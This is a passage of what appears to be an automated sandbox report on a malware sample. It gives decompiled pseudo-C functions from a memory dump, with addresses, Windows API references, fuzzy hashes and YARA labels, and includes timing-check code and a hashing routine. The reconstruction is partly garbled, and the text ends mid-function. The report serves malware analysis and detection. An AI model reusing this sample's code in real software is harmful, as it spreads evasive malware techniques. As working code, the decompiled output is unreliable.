				if(_t24 != 0) {
					E00407010( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E00419CD0( &_v284, 0x104);
						E0041A340( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00413DD0(E00413D70(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe1a5
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E00407040( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E004070C0(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}

0x004088bb
0x004088c3
0x004088c5
0x004088ca
0x004088cf
0x004088e2
0x004088e7
0x004088f0
0x004088fc
0x0040890f
0x00408914
0x00408917
0x00408920
0x00408932
0x00408937
0x0040893c
0x00000000
0x00000000
0x0040893e
0x00408942
0x00000000
0x00000000
0x00408944
0x00000000
0x00408942
0x00408946
0x00408949
0x0040894f
0x00408951
0x0040895c
0x00408961
0x00408964
0x00408971
0x0040897c
0x0040897e
0x00408984
0x00408988
0x0040898b
0x0040898b
0x00408992
0x00408995
0x0040899a
0x004089a7
0x004088d6
0x004088d6
0x004088d6

Memory Dump Source

Source File: 00000002.00000002.291525514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
Instruction ID: aa626ceb7ef0a3bcdbf1efb1d9dc2f5a7bb3811b4857f0e914c6161f28eec10c
Opcode Fuzzy Hash: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
Instruction Fuzzy Hash: FE213AB3D402085BDB10E6649D42BFF73AC9B50304F44057FF989A3182F638BB4987A6

Uniqueness

Uniqueness Score: -1.00%

Function 00418502, Relevance: 3.0, APIs: 2, Instructions: 30
memoryCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00418502(long __eax, void* __edx, void* __fp0, intOrPtr _a4, int _a8) {
				intOrPtr* __esi;
				void* _t7;
				void* _t8;
				long _t10;

				asm("das");
				asm("daa");
				_t10 = __edx + 1;
				asm("sti");
				asm("stosd");
				if(_t10 <= 0) {
					_push(0x8bec8b55);
					__eax = _a4;
					_push(__esi);
					__esi = _a4 + 0xc7c;
					__eax = E00418DC0(__edi, __eax, __esi,  *((intOrPtr*)(__eax + 0xa14)), 0, 0x36);
					__edx = _a8;
					__eax =  *__esi;
					ExitProcess(_a8);
				}
				_t7 = RtlAllocateHeap(_t8, __eax, _t10); // executed
				return _t7;
			}

0x00418502
0x00418503
0x00418504
0x0041850b
0x0041850c
0x0041850d
0x00418510
0x00418513
0x0041851c
0x00418522
0x0041852a
0x0041852f
0x00418532
0x00418538
0x00418538
0x004184bd
0x004184c1

APIs

RtlAllocateHeap.NTDLL(00413516,?,00413C8F,00413C8F,?,00413516,?,?,?,?,?,00000000,00408AF3,?), ref: 004184BD
ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418538

Memory Dump Source

Source File: 00000002.00000002.291525514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateExitHeapProcess
String ID:
API String ID: 1054155344-0
Opcode ID: c85a947149b0ad4705b1368172f9bbac167bcc2de2f2bac7fdfecbca8c876005
Instruction ID: 8df15ba2feeff19cac8b0c50cab5d1fbf85f41a2f54038422da473170fb410d5
Opcode Fuzzy Hash: c85a947149b0ad4705b1368172f9bbac167bcc2de2f2bac7fdfecbca8c876005
Instruction Fuzzy Hash: 5FE0D8B51056112FD710AB68DC85DD7B7A8DFC5740F148A6EE9D85B203C939A90487F4

Uniqueness

Uniqueness Score: -1.00%

Function 00407260, Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00407260(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E00419D20( &_v67, 0, 0x3f);
				E0041A900( &_v68, 3);
				_t12 = E00409B20(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00413E30(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E00409280(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}

0x00407260
0x0040726f
0x00407273
0x0040727e
0x0040728e
0x0040729e
0x004072a3
0x004072aa
0x004072ad
0x004072ba
0x004072bc
0x004072be
0x004072db
0x004072db
0x00000000
0x004072dd
0x004072e2

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA

Memory Dump Source

Source File: 00000002.00000002.291525514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
Instruction ID: bbcd0b2e5740072d15388175686a93538b06234ac68ffc2b081785cbfc84dfa6
Opcode Fuzzy Hash: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
Instruction Fuzzy Hash: 2B01D431A8022876E720A6959C03FFF772C9B00B54F05405EFF04BA1C2E6A87D0682EA

Uniqueness

Uniqueness Score: -1.00%

Function 00418621, Relevance: 1.5, APIs: 1, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00418621(void* __ecx, void* __esi, void* _a4, void* _a8, void* _a12, void* _a16) {
				void* _t28;

				_t28 = __esi + 1;
				asm("outsd");
				if ( *(__ecx - 0x6f) * 0xaf6bcc63 == 0) goto L3;
			}

0x00418621
0x00418629
0x0041862f

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFA2,0040CFA2,00000041,00000000,?,00408B65), ref: 00418660

Memory Dump Source

Source File: 00000002.00000002.291525514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: cef349d630f2e0345fceaabc367365987ff3a6e4b7fa5f771805456bfc512530
Instruction ID: 275080223b5d12f47d35dc80ffcb9e5ca6329e6cf5380b346ae3aa54420d722f
Opcode Fuzzy Hash: cef349d630f2e0345fceaabc367365987ff3a6e4b7fa5f771805456bfc512530
Instruction Fuzzy Hash: ABF08CB1200304ABCA14EF55DC89EE73769EF85210F01845AFD085B242DA35AD10CBF4

Uniqueness

Uniqueness Score: -1.00%

Function 00418456, Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMON

Download Yara Rule

C-Code - Quality: 19%

			E00418456(void* __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v116;
				void* _t17;
				void* _t18;
				intOrPtr* _t19;
				void* _t21;

				_v116 = _v116 & 0xffffffe4;
				asm("jecxz 0x57");
				_t10 = _a4;
				_t5 = _t10 + 0xc6c; // 0xc6e
				_t19 = _t5;
				E00418DC0(_t17, _a4, _t19,  *((intOrPtr*)(_t10 + 0x10)), 0, 0x33);
				return  *((intOrPtr*)( *_t19))(_a8, _a12, _t18, _t21);
			}

0x0041845b
0x0041845f
0x00418463
0x0041846f
0x0041846f
0x00418477
0x0041848d

APIs

RtlAllocateHeap.NTDLL(00413516,?,00413C8F,00413C8F,?,00413516,?,?,?,?,?,00000000,00408AF3,?), ref: 004184BD

Memory Dump Source

Source File: 00000002.00000002.291525514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 690ac834f2bfbdc7d5dae3b5fe7cebb604720b79d52f7cb2220d0aafdee56755
Instruction ID: 1b776e0d3bd090f7f729a30a693dc03b57e3f065e1da37275cb139fb26c4c879
Opcode Fuzzy Hash: 690ac834f2bfbdc7d5dae3b5fe7cebb604720b79d52f7cb2220d0aafdee56755
Instruction Fuzzy Hash: 6BF082B66002156BD724EF98DC84DE77768EF84320F10465DFA4957242CA35E90086A0

Uniqueness

Uniqueness Score: -1.00%

Function 004184D0, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004184D0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E00418DC0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x004184df
0x004184e7
0x004184fd
0x00418501

APIs

RtlFreeHeap.NTDLL(00000060,00408AF3,?,?,00408AF3,00000060,00000000,00000000,?,?,00408AF3,?,00000000), ref: 004184FD

Memory Dump Source

Source File: 00000002.00000002.291525514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: 0c1265b7fbf046cbfd36917309396888787f1b5b9f48543de1c0af89871077f5
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: 2EE01AB12002046BD714DF59DC45EA777ACAF88750F014559F90857241CA30E9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 00418490, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418490(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				long _t9;
				void* _t10;
				void* _t12;
				long _t13;
				void* _t15;

				E00418DC0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t13 = _a16;
				_t9 = _a12;
				_t12 = _a8;
				_t10 = RtlAllocateHeap(_t12, _t9, _t13); // executed
				return _t10;
			}

0x004184a7
0x004184ac
0x004184af
0x004184b2
0x004184bd
0x004184c1

APIs

RtlAllocateHeap.NTDLL(00413516,?,00413C8F,00413C8F,?,00413516,?,?,?,?,?,00000000,00408AF3,?), ref: 004184BD

Memory Dump Source

Source File: 00000002.00000002.291525514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: d4cd8ba0fc8cb19801f053331f4cf649e26225416c3eadc5d6da7764d9533391
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: 81E012B1200208ABDB14EF99DC41EA777ACAF88654F118559FA085B282CA30F9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 00418630, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFA2,0040CFA2,00000041,00000000,?,00408B65), ref: 00418660

Memory Dump Source

Source File: 00000002.00000002.291525514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: a95af6b202be8dae21372797db95a078404a8f30fafd20f5c772dce95c9aa66f
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 31E01AB12002086BDB10DF49DC85EE737ADAF89650F018559FA0857241CA34E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 00418510, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418510(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E00418DC0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}

0x00418513
0x0041852a
0x00418538

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418538

Memory Dump Source

Source File: 00000002.00000002.291525514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: 7205fd5e3e27dabd4e13006f85928de99448ffddaf0958f387cae24292a3a6f6
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: ACD012716003147BD620DF99DC85FD7779CDF49750F018469BA1C5B241C931BA0086E1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00408C60, Relevance: 1.7, Strings: 1, Instructions: 423
COMMONCrypto

Download Yara Rule

C-Code - Quality: 74%

			E00408C60(signed int* _a4) {
				char _v5;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				char _v304;
				signed char* _t277;
				signed int* _t278;
				signed int _t279;
				signed int _t285;
				signed int _t288;
				signed int _t292;
				signed int _t295;
				signed int _t299;
				signed int _t303;
				signed int _t305;
				signed int _t311;
				signed int _t318;
				signed int _t320;
				signed int _t323;
				signed int _t325;
				signed int _t334;
				signed int _t340;
				signed int _t341;
				signed int _t346;
				signed int _t348;
				signed int _t353;
				signed int _t357;
				signed int _t358;
				signed int _t362;
				signed int _t365;
				signed int _t369;
				signed int _t370;
				signed int _t399;
				signed int _t404;
				signed int _t410;
				signed int _t413;
				signed int _t420;
				signed int _t423;
				signed int _t432;
				signed int _t434;
				signed int _t437;
				signed int _t445;
				signed int _t459;
				signed int _t462;
				signed int _t463;
				signed int _t464;
				signed int _t470;
				signed int _t478;
				signed int _t479;
				signed int* _t480;
				signed int* _t481;
				signed int _t488;
				signed int _t491;
				signed int _t496;
				signed int _t499;
				signed int _t502;
				signed int _t505;
				signed int _t506;
				signed int _t510;
				signed int _t522;
				signed int _t525;
				signed int _t532;
				char* _t535;
				char* _t543;
				signed int _t544;

				_t481 = _a4;
				_t353 = 0;
				_t2 =  &(_t481[7]); // 0x1b
				_t277 = _t2;
				do {
					 *(_t535 + _t353 * 4 - 0x14c) = ((( *(_t277 - 1) & 0x000000ff) << 0x00000008 |  *_t277 & 0x000000ff) << 0x00000008 | _t277[1] & 0x000000ff) << 0x00000008 | _t277[2] & 0x000000ff;
					 *(_t535 + _t353 * 4 - 0x148) = (((_t277[3] & 0x000000ff) << 0x00000008 | _t277[4] & 0x000000ff) << 0x00000008 | _t277[5] & 0x000000ff) << 0x00000008 | _t277[6] & 0x000000ff;
					 *(_t535 + _t353 * 4 - 0x144) = (((_t277[7] & 0x000000ff) << 0x00000008 | _t277[8] & 0x000000ff) << 0x00000008 | _t277[9] & 0x000000ff) << 0x00000008 | _t277[0xa] & 0x000000ff;
					 *(_t535 + _t353 * 4 - 0x140) = (((_t277[0xb] & 0x000000ff) << 0x00000008 | _t277[0xc] & 0x000000ff) << 0x00000008 | _t277[0xd] & 0x000000ff) << 0x00000008 | _t277[0xe] & 0x000000ff;
					_t353 = _t353 + 4;
					_t277 =  &(_t277[0x10]);
				} while (_t353 < 0x10);
				_t278 =  &_v304;
				_v8 = 0x10;
				do {
					_t399 =  *(_t278 - 0x18);
					_t459 =  *(_t278 - 0x14);
					_t357 =  *(_t278 - 0x20) ^ _t278[5] ^  *_t278 ^ _t399;
					asm("rol ecx, 1");
					asm("rol ebx, 1");
					_t278[9] =  *(_t278 - 0x1c) ^ _t278[6] ^ _t278[1] ^ _t459;
					_t278[8] = _t357;
					_t318 = _t278[7] ^  *(_t278 - 0x10) ^ _t278[2];
					_t278 =  &(_t278[4]);
					asm("rol ebx, 1");
					asm("rol edx, 1");
					_t46 =  &_v8;
					 *_t46 = _v8 - 1;
					_t278[6] = _t318 ^ _t399;
					_t278[7] =  *(_t278 - 0x1c) ^  *(_t278 - 4) ^ _t357 ^ _t459;
				} while ( *_t46 != 0);
				_t320 =  *_t481;
				_t279 = _t481[1];
				_t358 = _t481[2];
				_t404 = _t481[3];
				_v12 = _t320;
				_v16 = _t481[4];
				_v8 = 0;
				do {
					asm("rol ebx, 0x5");
					_t462 = _v8;
					_t488 = _t320 + ( !_t279 & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t535 + _t462 * 4 - 0x14c)) + _v16 + 0x5a827999;
					_t323 = _v12;
					asm("ror eax, 0x2");
					_v16 = _t404;
					_v12 = _t488;
					asm("rol esi, 0x5");
					_v8 = _t358;
					_t410 = _t488 + ( !_t323 & _t358 | _t279 & _t323) +  *((intOrPtr*)(_t535 + _t462 * 4 - 0x148)) + _v16 + 0x5a827999;
					_t491 = _t279;
					asm("ror ebx, 0x2");
					_v16 = _v8;
					_t362 = _v12;
					_v8 = _t323;
					_t325 = _v8;
					_v12 = _t410;
					asm("rol edx, 0x5");
					_t285 = _t410 + ( !_t362 & _t491 | _t323 & _t362) +  *((intOrPtr*)(_t535 + _t462 * 4 - 0x144)) + _v16 + 0x5a827999;
					_t413 = _v12;
					_v16 = _t491;
					asm("ror ecx, 0x2");
					_v8 = _t362;
					_v12 = _t285;
					asm("rol eax, 0x5");
					_v16 = _t325;
					_t496 = _t285 + ( !_t413 & _t325 | _t362 & _t413) +  *((intOrPtr*)(_t535 + _t462 * 4 - 0x140)) + _v16 + 0x5a827999;
					_t358 = _v12;
					_t288 = _v8;
					asm("ror edx, 0x2");
					_v8 = _t413;
					_v12 = _t496;
					asm("rol esi, 0x5");
					_v16 = _t288;
					_t279 = _v12;
					_t499 = _t496 + ( !_t358 & _t288 | _t413 & _t358) +  *((intOrPtr*)(_t535 + _t462 * 4 - 0x13c)) + _v16 + 0x5a827999;
					_t404 = _v8;
					asm("ror ecx, 0x2");
					_t463 = _t462 + 5;
					_t320 = _t499;
					_v12 = _t320;
					_v8 = _t463;
				} while (_t463 < 0x14);
				_t464 = 0x14;
				do {
					asm("rol esi, 0x5");
					asm("ror eax, 0x2");
					_v16 = _t404;
					_t502 = _t499 + (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t535 + _t464 * 4 - 0x14c)) + _v16 + 0x6ed9eba1;
					_t334 = _v12;
					_v12 = _t502;
					asm("rol esi, 0x5");
					_t420 = _t502 + (_t358 ^ _t279 ^ _t334) +  *((intOrPtr*)(_t535 + _t464 * 4 - 0x148)) + _v16 + 0x6ed9eba1;
					asm("ror ebx, 0x2");
					_t505 = _t279;
					_v16 = _t358;
					_t365 = _v12;
					_v12 = _t420;
					asm("rol edx, 0x5");
					asm("ror ecx, 0x2");
					_t292 = _t420 + (_t279 ^ _t334 ^ _t365) +  *((intOrPtr*)(_t535 + _t464 * 4 - 0x144)) + _v16 + 0x6ed9eba1;
					_t423 = _v12;
					_v8 = _t334;
					_v8 = _t365;
					_v12 = _t292;
					asm("rol eax, 0x5");
					_t464 = _t464 + 5;
					_t358 = _v12;
					asm("ror edx, 0x2");
					_t146 = _t505 + 0x6ed9eba1; // 0x6ed9eb9f
					_t506 = _t292 + (_t334 ^ _v8 ^ _t423) +  *((intOrPtr*)(_t535 + _t464 * 4 - 0x154)) + _t146;
					_t295 = _v8;
					_v8 = _t423;
					_v12 = _t506;
					asm("rol esi, 0x5");
					_t404 = _v8;
					_t499 = _t506 + (_t295 ^ _v8 ^ _t358) +  *((intOrPtr*)(_t535 + _t464 * 4 - 0x150)) + _t334 + 0x6ed9eba1;
					_v16 = _t295;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t499;
				} while (_t464 < 0x28);
				_v8 = 0x28;
				do {
					asm("rol esi, 0x5");
					_v16 = _t404;
					asm("ror eax, 0x2");
					_t510 = ((_t358 | _t279) & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t535 + _v8 * 4 - 0x14c)) + _t499 + _v16 - 0x70e44324;
					_t470 = _v12;
					_v12 = _t510;
					asm("rol esi, 0x5");
					_t340 = _v8;
					asm("ror edi, 0x2");
					_t432 = ((_t279 | _t470) & _t358 | _t279 & _t470) +  *((intOrPtr*)(_t535 + _t340 * 4 - 0x148)) + _t510 + _v16 - 0x70e44324;
					_v16 = _t358;
					_t369 = _v12;
					_v12 = _t432;
					asm("rol edx, 0x5");
					_v8 = _t279;
					_t434 = ((_t470 | _t369) & _t279 | _t470 & _t369) +  *((intOrPtr*)(_t535 + _t340 * 4 - 0x144)) + _t432 + _v16 - 0x70e44324;
					asm("ror ecx, 0x2");
					_v16 = _v8;
					_t299 = _v12;
					_v8 = _t470;
					_v12 = _t434;
					asm("rol edx, 0x5");
					asm("ror eax, 0x2");
					_t522 = ((_t369 | _t299) & _t470 | _t369 & _t299) +  *((intOrPtr*)(_t535 + _t340 * 4 - 0x140)) + _t434 + _v16 - 0x70e44324;
					_v16 = _v8;
					_t437 = _t369;
					_t358 = _v12;
					_v8 = _t437;
					_v12 = _t522;
					asm("rol esi, 0x5");
					_v16 = _v8;
					_t499 = ((_t299 | _t358) & _t437 | _t299 & _t358) +  *((intOrPtr*)(_t535 + _t340 * 4 - 0x13c)) + _t522 + _v16 - 0x70e44324;
					_t404 = _t299;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t499;
					_t341 = _t340 + 5;
					_v8 = _t341;
				} while (_t341 < 0x3c);
				_t478 = 0x3c;
				_v8 = 0x3c;
				do {
					asm("rol esi, 0x5");
					_t479 = _v8;
					asm("ror eax, 0x2");
					_t525 = (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t535 + _t478 * 4 - 0x14c)) + _t499 + _v16 - 0x359d3e2a;
					_t346 = _v12;
					_v16 = _t404;
					_v12 = _t525;
					asm("rol esi, 0x5");
					asm("ror ebx, 0x2");
					_t445 = (_t358 ^ _t279 ^ _t346) +  *((intOrPtr*)(_t535 + _t479 * 4 - 0x148)) + _t525 + _v16 - 0x359d3e2a;
					_v16 = _t358;
					_t370 = _v12;
					_v12 = _t445;
					asm("rol edx, 0x5");
					_v16 = _t279;
					asm("ror ecx, 0x2");
					_t303 = (_t279 ^ _t346 ^ _t370) +  *((intOrPtr*)(_t535 + _t479 * 4 - 0x144)) + _t445 + _v16 - 0x359d3e2a;
					_t404 = _v12;
					_v12 = _t303;
					asm("rol eax, 0x5");
					_v16 = _t346;
					_t532 = (_t346 ^ _t370 ^ _t404) +  *((intOrPtr*)(_t535 + _t479 * 4 - 0x140)) + _t303 + _v16 - 0x359d3e2a;
					_t305 = _t370;
					_v8 = _t346;
					asm("ror edx, 0x2");
					_v8 = _t370;
					while(1) {
						_t535 =  &_v5;
						_t543 = _t535;
						asm("cld");
						_t358 = _v12;
						_v12 = _t532;
						L13:
						while(_t543 == 0) {
							_t348 = _t305 ^ _t404;
							asm("rol esi, 0x5");
							_t532 = _t532 + _v16;
							_t544 = _t532;
							if(_t544 != 0) {
								continue;
							}
							goto L16;
						}
						_t535 =  &_v5;
						_t543 = _t535;
						asm("cld");
						_t358 = _v12;
						_v12 = _t532;
						goto L13;
					}
					L16:
					_t478 = _t479 + 5;
					_t499 = (_t348 ^ _t358) +  *((intOrPtr*)(_t535 + _t479 * 4 - 0x13c)) + _t532 - 0x359d3e2a;
					_v16 = _t305;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v8 = _t404;
					_v12 = _t499;
					_v8 = _t478;
				} while (_t478 < 0x50);
				_t480 = _a4;
				_t480[2] = _t480[2] + _t358;
				_t480[3] = _t480[3] + _t404;
				_t311 = _t480[4] + _v16;
				 *_t480 =  *_t480 + _t499;
				_t480[1] = _t480[1] + _t279;
				_t480[4] = _t311;
				_t480[0x17] = 0;
				return _t311;
			}

0x00408c6b
0x00408c6f
0x00408c71
0x00408c71
0x00408c74
0x00408c96
0x00408cbc
0x00408ce2
0x00408d04
0x00408d0b
0x00408d0e
0x00408d11
0x00408d1a
0x00408d20
0x00408d27
0x00408d38
0x00408d3b
0x00408d3e
0x00408d42
0x00408d44
0x00408d46
0x00408d4f
0x00408d52
0x00408d55
0x00408d60
0x00408d66
0x00408d68
0x00408d68
0x00408d6b
0x00408d6e
0x00408d6e
0x00408d73
0x00408d75
0x00408d78
0x00408d7b
0x00408d81
0x00408d84
0x00408d87
0x00408d90
0x00408d96
0x00408d9f
0x00408dae
0x00408db5
0x00408db8
0x00408dbb
0x00408dc4
0x00408dc7
0x00408dca
0x00408de2
0x00408de9
0x00408deb
0x00408dee
0x00408df1
0x00408dfa
0x00408e01
0x00408e04
0x00408e07
0x00408e16
0x00408e1d
0x00408e20
0x00408e23
0x00408e2c
0x00408e36
0x00408e39
0x00408e45
0x00408e48
0x00408e4f
0x00408e52
0x00408e55
0x00408e5a
0x00408e5d
0x00408e66
0x00408e77
0x00408e7a
0x00408e7d
0x00408e84
0x00408e87
0x00408e8a
0x00408e8d
0x00408e8f
0x00408e92
0x00408e95
0x00408e9e
0x00408ea3
0x00408ea3
0x00408eb8
0x00408ebb
0x00408ebe
0x00408ec5
0x00408ec8
0x00408ecb
0x00408ee0
0x00408ee7
0x00408eea
0x00408eee
0x00408ef1
0x00408ef6
0x00408ef9
0x00408f08
0x00408f0b
0x00408f12
0x00408f15
0x00408f18
0x00408f1b
0x00408f1e
0x00408f26
0x00408f34
0x00408f37
0x00408f3a
0x00408f3a
0x00408f41
0x00408f44
0x00408f47
0x00408f4f
0x00408f5d
0x00408f60
0x00408f67
0x00408f6a
0x00408f6d
0x00408f70
0x00408f73
0x00408f7c
0x00408f83
0x00408f83
0x00408f89
0x00408fa2
0x00408fa5
0x00408fac
0x00408faf
0x00408fb2
0x00408fc4
0x00408fce
0x00408fd1
0x00408fda
0x00408fdd
0x00408fe4
0x00408fe7
0x00408fed
0x00409000
0x00409007
0x0040900a
0x0040900d
0x00409010
0x00409019
0x0040901c
0x0040902f
0x00409032
0x0040903c
0x0040903f
0x00409041
0x0040904a
0x0040904d
0x00409060
0x00409066
0x00409069
0x00409070
0x00409072
0x00409075
0x00409078
0x0040907b
0x0040907e
0x00409081
0x0040908a
0x0040908f
0x00409092
0x00409092
0x004090a5
0x004090a8
0x004090ab
0x004090b2
0x004090b5
0x004090b8
0x004090bb
0x004090ce
0x004090d1
0x004090dc
0x004090df
0x004090eb
0x004090ee
0x004090f4
0x004090f7
0x004090fa
0x00409101
0x00409111
0x00409114
0x0040911a
0x0040911d
0x00409124
0x00409126
0x00409129
0x0040912c
0x0040912d
0x0040912d
0x0040912d
0x0040912e
0x0040912f
0x00409132
0x00000000
0x00409133
0x00409137
0x00409139
0x0040913c
0x0040913c
0x0040913d
0x00000000
0x00000000
0x00000000
0x0040913d
0x0040912d
0x0040912d
0x0040912e
0x0040912f
0x00409132
0x00000000
0x00409132
0x0040913f
0x00409148
0x0040914b
0x00409152
0x00409155
0x00409158
0x0040915b
0x0040915e
0x00409161
0x00409164
0x0040916d
0x0040917e
0x00409186
0x0040918c
0x0040918f
0x00409191
0x00409194
0x00409197
0x004091a4

Strings

(, xrefs: 00408F7C

Memory Dump Source

Source File: 00000002.00000002.291525514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
Instruction ID: d8c2fb7df0c5b58699e1db2dcf7a8d999a68655801dbc0658ec4d80d3c45db5f
Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
Instruction Fuzzy Hash: 19021CB6E006189FDB14CF9AC8805DDFBF2FF88314F1AC1AAD859A7355D6746A418F80

Uniqueness

Uniqueness Score: -1.00%

Function 0041BB8C, Relevance: .6, Instructions: 582
COMMONCrypto

Download Yara Rule

C-Code - Quality: 53%

			E0041BB8C() {
				signed int _t71;
				signed char _t77;
				signed char _t78;
				signed char _t79;
				signed int _t83;
				signed int _t90;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				intOrPtr _t101;
				void* _t102;
				void* _t103;
				void* _t104;
				signed int _t105;
				signed int _t109;
				intOrPtr _t112;
				intOrPtr _t113;
				void* _t114;
				signed int _t116;
				intOrPtr _t117;
				signed int _t118;

				asm("sbb eax, 0x8eca17e9");
				asm("sbb [0x9f91640c], bl");
